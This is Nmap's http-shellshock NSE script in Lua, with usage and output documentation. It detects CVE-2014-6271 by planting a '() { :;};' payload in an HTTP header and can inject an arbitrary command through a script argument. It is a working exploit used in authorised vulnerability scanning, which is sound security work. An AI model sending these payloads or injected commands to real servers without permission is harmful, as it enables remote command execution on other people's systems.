description = [[ Attempts to exploit the vulnerability known as "shellshock" against web applications via HTTP headers. By default it simply echoes back a random string but other commands may be injected. To detect this vulnerability the script executes a command that prints a random string and then looks for it inside the page's body. Vulnerability originally discovered by Stephane Chazelas. References: * http://www.openwall.com/lists/oss-security/2014/09/24/10 * http://seclists.org/oss-sec/2014/q3/685 * ]] -- @usage -- nmap -sV -p- --script http-shellshock -- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack -- | http-shellshock: -- | VULNERABLE: -- | HTTP Shellshock vulnerability -- | State: VULNERABLE (Exploitable) -- | IDs: CVE:CVE-2014-6271 -- | This web application might be affected by the vulnerability known as Shellshock. It seems the server -- | is executing commands injected via malicious HTTP headers. -- | -- | Disclosure date: 2014-09-24 -- | References: -- | http://www.openwall.com/lists/oss-security/2014/09/24/10 -- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 -- | http://seclists.org/oss-sec/2014/q3/685 -- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 -- -- @xmloutput -- HTTP Shellshock vulnerability -- VULNERABLE (Exploitable) -- -- CVE:CVE-2014-6271 --
-- -- This web application might be affected by the vulnerability known as Shellshock. It seems the server is executing commands injected via malicious HTTP headers. --
-- --
-- 2014 -- 24 -- 09 --
-- -- 2014-09-24 -- -- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 -- http://www.openwall.com/lists/oss-security/2014/09/24/10 -- http://seclists.org/oss-sec/2014/q3/685 -- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 --
-- @args http-shellshock.uri URI. Default: / -- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent -- @args http-shellshock.cmd Custom command to send inside payload. Default: nil --- author = {"Paulino Calderon "} license = "Same as Nmap--See http://nmap.org/book/man-legal.html" categories = {"exploit","vuln","intrusive"} local http = require "http" local shortport = require "shortport" local stdnse = require "stdnse" local vulns = require "vulns" portrule = shortport.http action = function(host, port) local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or "User-Agent" local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/' local rnd = stdnse.generate_random_string(15) local payload = '() { :;}; echo; echo "'..rnd..'"' if cmd ~= nil then cmd = '() { :;}; '..cmd end -- Plant the payload in the HTTP headers local options = {header={}} options["no_cache"] = true options["header"][http_header] = payload stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", payload, http_header)) local req = http.get(host, port, uri, options) if req.status == 200 and string.match(req.body, rnd) ~= nil then local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) local vuln = { title = 'HTTP Shellshock vulnerability', state = vulns.STATE.NOT_VULN, description = [[ This web application might be affected by the vulnerability known as Shellshock. It seems the server is executing commands injected via malicious HTTP headers. ]], IDS = {CVE = 'CVE-2014-6271'}, references = { 'http://www.openwall.com/lists/oss-security/2014/09/24/10', 'http://seclists.org/oss-sec/2014/q3/685', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169' }, dates = { disclosure = {year = '2014', month = '09', day = '24'}, }, } stdnse.debug(1, string.format("Random pattern '%s' was found in page. Host seems vulnerable.", rnd)) vuln.state = vulns.STATE.EXPLOIT if cmd ~= nil then options["header"][http_header] = cmd stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", cmd, http_header)) req = http.get(host, port, uri, options) vuln.exploit_results = req.body end return vuln_report:make_output(vuln) end end